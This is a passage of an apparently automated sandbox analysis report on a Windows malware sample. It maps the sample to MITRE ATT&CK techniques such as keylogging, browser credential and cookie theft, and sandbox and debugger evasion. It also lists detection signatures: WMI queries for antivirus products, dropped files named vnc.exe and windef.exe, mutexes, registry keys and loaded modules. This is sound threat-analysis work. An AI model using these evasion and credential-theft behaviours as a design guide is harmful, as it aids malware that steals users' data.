Evasion", "technique": "Make and Impersonate Token", "attck_id": "T1134.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/003", "suspicious_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Keylogging", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Credential Access", "technique": "Credentials from Web Browsers", "attck_id": "T1555.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1555/003", "suspicious_identifiers_count": 1, "parent": {"technique": "Credentials from Password Stores", "attck_id": "T1555", "attck_id_wiki": "https://attack.mitre.org/techniques/T1555"}}, {"tactic": "Credential Access", "technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Steal Web Session Cookie", "attck_id": "T1539", "attck_id_wiki": "https://attack.mitre.org/techniques/T1539", "suspicious_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Credentials from Password Stores", "attck_id": "T1555", "attck_id_wiki": "https://attack.mitre.org/techniques/T1555", "informative_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Credentials In Files", "attck_id": "T1552.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1552/001", "malicious_identifiers_count": 1, "parent": {"technique": "Unsecured Credentials", "attck_id": "T1552", "attck_id_wiki": "https://attack.mitre.org/techniques/T1552"}}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "suspicious_identifiers_count": 1, "informative_identifiers_count": 13}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 4, "informative_identifiers_count": 11}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 2, "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 6, "informative_identifiers_count": 28}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "suspicious_identifiers_count": 5, "informative_identifiers_count": 5}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 4}, {"tactic": "Discovery", "technique": "System Network Configuration Discovery", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 1, "informative_identifiers_count": 4}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 3, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Time Discovery", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124", "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "suspicious_identifiers_count": 1, "informative_identifiers_count": 6}, {"tactic": "Discovery", "technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614", "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Network Connections Discovery", "attck_id": "T1049", "attck_id_wiki": "https://attack.mitre.org/techniques/T1049", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Network Share Discovery", "attck_id": "T1135", "attck_id_wiki": "https://attack.mitre.org/techniques/T1135", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "System Language Discovery", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001", "informative_identifiers_count": 2, "parent": {"technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}}, {"tactic": "Discovery", "technique": "Remote System Discovery", "attck_id": "T1018", "attck_id_wiki": "https://attack.mitre.org/techniques/T1018", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 3, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Internet Connection Discovery", "attck_id": "T1016.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016/001", "informative_identifiers_count": 1, "parent": {"technique": "System Network Configuration Discovery", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016"}}, {"tactic": "Discovery", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 4}, {"tactic": "Discovery", "technique": "Security Software Discovery", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001", "informative_identifiers_count": 1, "parent": {"technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}}, {"tactic": "Discovery", "technique": "Browser Information Discovery", "attck_id": "T1217", "attck_id_wiki": "https://attack.mitre.org/techniques/T1217", "suspicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Peripheral Device Discovery", "attck_id": "T1120", "attck_id_wiki": "https://attack.mitre.org/techniques/T1120", "malicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Service Discovery", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007", "informative_identifiers_count": 1}, {"tactic": "Lateral Movement", "technique": "Lateral Tool Transfer", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570", "informative_identifiers_count": 1}, {"tactic": "Lateral Movement", "technique": "Remote Desktop Protocol", "attck_id": "T1021.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1021/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Remote Services", "attck_id": "T1021", "attck_id_wiki": "https://attack.mitre.org/techniques/T1021"}}, {"tactic": "Collection", "technique": "Screen Capture", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113", "informative_identifiers_count": 3}, {"tactic": "Collection", "technique": "Local Data Staging", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Data Staged", "attck_id": "T1074", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074"}}, {"tactic": "Collection", "technique": "Data from Local System", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005", "suspicious_identifiers_count": 7, "informative_identifiers_count": 2}, {"tactic": "Collection", "technique": "Keylogging", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Collection", "technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Clipboard Data", "attck_id": "T1115", "attck_id_wiki": "https://attack.mitre.org/techniques/T1115", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Data from Information Repositories", "attck_id": "T1213", "attck_id_wiki": "https://attack.mitre.org/techniques/T1213", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Archive via Library", "attck_id": "T1560.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1560/002", "informative_identifiers_count": 1, "parent": {"technique": "Archive Collected Data", "attck_id": "T1560", "attck_id_wiki": "https://attack.mitre.org/techniques/T1560"}}, {"tactic": "Collection", "technique": "Automated Collection", "attck_id": "T1119", "attck_id_wiki": "https://attack.mitre.org/techniques/T1119", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Web Protocols", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001", "suspicious_identifiers_count": 2, "informative_identifiers_count": 8, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "suspicious_identifiers_count": 1, "informative_identifiers_count": 9}, {"tactic": "Command and Control", "technique": "Non-Application Layer Protocol", "attck_id": "T1095", "attck_id_wiki": "https://attack.mitre.org/techniques/T1095", "informative_identifiers_count": 2}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 3, "informative_identifiers_count": 5}, {"tactic": "Command and Control", "technique": "Non-Standard Port", "attck_id": "T1571", "attck_id_wiki": "https://attack.mitre.org/techniques/T1571", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573", "suspicious_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Data Encoding", "attck_id": "T1132", "attck_id_wiki": "https://attack.mitre.org/techniques/T1132", "informative_identifiers_count": 2}, {"tactic": "Command and Control", "technique": "DNS", "attck_id": "T1071.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/004", "informative_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Symmetric Cryptography", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001", "informative_identifiers_count": 2, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Exfiltration", "technique": "Scheduled Transfer", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "System Shutdown/Reboot", "attck_id": "T1529", "attck_id_wiki": "https://attack.mitre.org/techniques/T1529", "malicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "Data Encrypted for Impact", "attck_id": "T1486", "attck_id_wiki": "https://attack.mitre.org/techniques/T1486", "informative_identifiers_count": 2}, {"tactic": "Impact", "technique": "Disk Content Wipe", "attck_id": "T1561.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1561/001", "informative_identifiers_count": 1, "parent": {"technique": "Disk Wipe", "attck_id": "T1561", "attck_id_wiki": "https://attack.mitre.org/techniques/T1561"}}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "string-605", "type": 2, "relevance": 1, "name": "May execute SQL queries", "description": "\"SELECT Caption FROM Win32_OperatingSystem\" (Source: 3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac, Indicator: \"select caption from win32_operatingsystem\")\n \"SELECT * FROM Win32_BIOS\" (Source: 3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac, Indicator: \"select * from win32_bios\")\n \"SELECT * FROM Win32_BaseBoard\" (Source: 3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac, Indicator: \"select * from win32_baseboard\")\n \"SELECT * FROM Win32_Processor\" (Source: 3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac, Indicator: \"select * from win32_processor\")\n \"Select * From Win32_ComputerSystem\" (Source: 3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac, Indicator: \"select * from win32_computersystem\")\n \"SELECT * FROM Win32_DisplayConfiguration\" (Source: 3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac, Indicator: \"select * from win32_displayconfiguration\")\n \"SELECT * FROM Win32_OperatingSystem WHERE Primary='true'\" (Source: 3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac, Indicator: \"select * from win32_operatingsystem where primary='true'\")\n \"SELECT * FROM AntivirusProduct\" (Source: 3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac, Indicator: \"select * from antivirusproduct\")\n \"SELECT * FROM FirewallProduct\" (Source: 3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac, Indicator: \"select * from firewallproduct\")", "origin": "File/Memory", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-267", "type": 6, "relevance": 1, "name": "Writes files in a temp directory", "description": "\"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\vnc.exe\"\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\windef.exe\"", "origin": "API Call", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level_human": "informative", "category": "General", "identifier": "mutant-0", "type": 4, "relevance": 3, "name": "Creates mutants", "description": "\"\\Sessions\\1\\BaseNamedObjects\\runas\"\n \"Local\\ZonesLockedCacheCounterMutex\"\n \"Local\\ZonesCacheCounterMutex\"\n \"runas\"\n \"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\Global\\CLR_PerfMon_WrapMutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\QSR_MUTEX_0kBRNrRz5TDLEQouI0\"\n \"\\Sessions\\1\\BaseNamedObjects\\RasPbFile\"\n \"Global\\CLR_PerfMon_WrapMutex\"\n \"RasPbFile\"\n \"QSR_MUTEX_0kBRNrRz5TDLEQouI0\"\n \"\\Sessions\\1\\BaseNamedObjects\\AD19930C-9343A2EC-6B6BB927-99B5A429-04F88E236\"", "origin": "Created Mutant"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-72", "type": 3, "relevance": 3, "name": "Overview of unique CLSIDs touched in registry", "description": "\"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" touched \"Property System Both Class Factory\" (Path: \"HKCU\\CLSID\\{76765B11-3F95-4AF2-AC9D-EA55D8994F1A}\")\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" touched \"delegate folder that appears in Users Files Folder\" (Path: \"HKCU\\CLSID\\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}\\INPROCSERVER32\")\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" touched \"Shell File System Folder\" (Path: \"HKCU\\CLSID\\{0E5AAE11-A475-4C5B-AB00-C66DE400274E}\\INPROCSERVER32\")\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" touched \"Network\" (Path: \"HKCU\\CLSID\\{208D2C60-3AEA-1069-A2D7-08002B30309D}\\SHELLFOLDER\")\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" touched \"Recycle Bin\" (Path: \"HKCU\\CLSID\\{645FF040-5081-101B-9F08-00AA002F954E}\\SHELLFOLDER\")\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" touched \"Control Panel\" (Path: \"HKCU\\CLSID\\{26EE0668-A00A-44D7-9371-BEB064C98683}\\SHELLFOLDER\")\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" touched \"UsersLibraries\" (Path: \"HKCU\\CLSID\\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\\SHELLFOLDER\")\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" touched \"CLSID_SearchFolder\" (Path: \"HKCU\\CLSID\\{04731B67-D933-450A-90E6-4ACD2E9408FE}\\SHELLFOLDER\")\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" touched \"Microsoft OneNote Namespace Extension for Windows Desktop Search\" (Path: \"HKCU\\CLSID\\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\\SHELLFOLDER\")\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" touched \"IE History and Feeds Shell Data Source for Windows Search\" (Path: \"HKCU\\CLSID\\{11016101-E366-4D22-BC06-4ADA335C892B}\\SHELLFOLDER\")\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" touched \"@C:\\Program Files (x86)\\Microsoft Office\\Office15\\MAPISHELL.DLL,-110\" (Path: \"HKCU\\CLSID\\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\\SHELLFOLDER\")\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" touched \"Public Folder\" (Path: \"HKCU\\CLSID\\{4336A54D-038B-4685-AB02-99BB52D3FB8B}\\SHELLFOLDER\")\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" touched \"Control Panel command object for Start menu and desktop\" (Path: \"HKCU\\CLSID\\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\\SHELLFOLDER\")\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" touched \"@%systemroot%\\system32\\mssvp.dll,-110\" (Path: \"HKCU\\CLSID\\{89D83576-6BD1-4C86-9454-BEB04E94C819}\\SHELLFOLDER\")\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" touched \"DXP\" (Path: \"HKCU\\CLSID\\{8FD8B88D-30E1-4F25-AC2B-553D3D65F0EA}\\SHELLFOLDER\")\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" touched \"CLSID_SearchHome\" (Path: \"HKCU\\CLSID\\{9343812E-1C37-4A49-A12E-4B2D810D956B}\\SHELLFOLDER\")\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" touched \"Windows Search Service Media Center Namespace Extension Handler\" (Path: \"HKCU\\CLSID\\{98D99750-0B8A-4C59-9151-589053683D73}\\SHELLFOLDER\")\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" touched \"Other Users Folder\" (Path: \"HKCU\\CLSID\\{B4FB3F98-C1EA-428D-A78A-D1F5659CBA93}\\SHELLFOLDER\")\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" touched \"@%systemroot%\\system32\\mssvp.dll,-112\" (Path: \"HKCU\\CLSID\\{BD7A2E7B-21CB-41B2-A086-B309680C6B7E}\\SHELLFOLDER\")\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" touched \"CLSID_StartMenuProviderFolder\" (Path: \"HKCU\\CLSID\\{DAF95313-E44D-46AF-BE1B-CBACEA2C3065}\\SHELLFOLDER\")\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" touched \"CLSID_StartMenuPathCompleteProviderFolder\" (Path: \"HKCU\\CLSID\\{E345F35F-9397-435C-8F95-4E922C26259E}\\SHELLFOLDER\")\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" touched \"Games Explorer\" (Path: \"HKCU\\CLSID\\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}\\SHELLFOLDER\")\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" touched \"Computers and Devices\" (Path: \"HKCU\\CLSID\\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\\SHELLFOLDER\")\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" touched \"Sticky Notes Namespace Extension for Windows Desktop Search\" (Path: \"HKCU\\CLSID\\{F3F5824C-AD58-4728-AF59-A1EBE3392799}\\SHELLFOLDER\")\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" touched \"Computer\" (Path: \"HKCU\\CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\SHELLFOLDER\")\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" touched \"Memory Mapped Cache Mgr\" (Path: \"HKCU\\CLSID\\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\")\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" touched \"UsersFiles\" (Path: \"HKCU\\CLSID\\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\\SHELLFOLDER\")\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" touched \"Security Manager\" (Path: \"HKCU\\CLSID\\{7B8A2D94-0AC9-11D1-896C-00C04FB6BFC4}\\TREATAS\")", "origin": "Registry Access", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-3", "type": 10, "name": "Loads the .NET runtime environment", "description": "\"windef.exe\" loaded module \"%WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\36eaccfde177c2e7b93b8dbdde4e012a\\mscorlib.ni.dll\" at 63160000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-9", "type": 10, "name": "Loads the Bcrypt module DLL", "description": "\"windef.exe\" loaded module \"%WINDIR%\\System32\\bcrypt.dll\" at 74C00000", "origin": "Loaded Module", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70d90000\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" loaded module \"KERNEL32\" at base 755d0000\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 73bb0000\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" loaded module \"KERNEL32.DLL\" at base 755d0000\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" loaded module \"DWMAPI.DLL\" at base 73930000\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" loaded module \"COMCTL32.DLL\" at base 73fe0000\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" loaded module \"UXTHEME.DLL\" at base 73bb0000\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" loaded module \"IMM32.DLL\" at base 76de0000\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" loaded module \"COMCTL32\" at base 73fe0000\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" loaded module \"ADVAPI32.DLL\" at base 77130000\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" loaded module \"CRYPTSP.DLL\" at base 74af0000\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 74880000\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" loaded module \"CRYPTBASE.DLL\" at base 74fe0000\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" loaded module \"OLE32.DLL\" at base 76fd0000\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" loaded module \"SHELL32.DLL\" at base 760e0000\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" loaded module \"PROPSYS.DLL\" at base 73c50000\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" loaded module \"OLEAUT32.DLL\" at base 77390000\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" loaded module \"CLBCATQ.DLL\" at base 76ee0000\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 73c50000\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" loaded module \"NTMARTA.DLL\" at base 74550000\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" loaded module \"API-MS-WIN-SECURITY-SDDL-L1-1-0.DLL\" at base 75ee0000\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" loaded module \"PROFAPI.DLL\" at base 750f0000\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" loaded module \"APPHELP.DLL\" at base 74f90000\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" loaded module \"%WINDIR%\\SYSTEM32\\SHDOCVW.DLL\" at base 6ec20000\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" loaded module \"%WINDIR%\\SYSTEM32\\SHELL32.DLL\" at base 760e0000\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 755d0000\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" loaded module \"SETUPAPI.DLL\" at base 75420000\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" loaded module \"RPCRT4.DLL\" at base 75f00000\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" loaded module \"%WINDIR%\\SYSTEM32\\URLMON.DLL\" at base 75d90000\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" loaded module \"SECUR32.DLL\" at base 74e10000\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" loaded module 